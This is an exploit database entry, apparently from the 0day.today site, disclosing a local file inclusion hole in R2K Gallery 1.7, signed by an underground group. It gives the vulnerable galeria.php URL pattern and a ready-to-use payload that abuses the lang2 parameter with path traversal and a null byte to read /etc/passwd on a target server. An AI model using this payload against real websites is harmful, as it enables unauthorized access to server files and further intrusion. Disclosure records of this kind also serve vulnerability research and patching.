[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability

Author
Dj7xpl
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1861
Category
web applications
Date add
10-05-2007
Platform
unsorted
======================================================================
R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability
======================================================================



        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   R2K Gallery v1.7
[!] Download :   http://usuarios.lycos.es/r2kscripts/
[!] Type     :   Local File Include Vuln

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]

Example :

http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00

---------------------------------------------------------------------



#  0day.today [2024-11-15]  #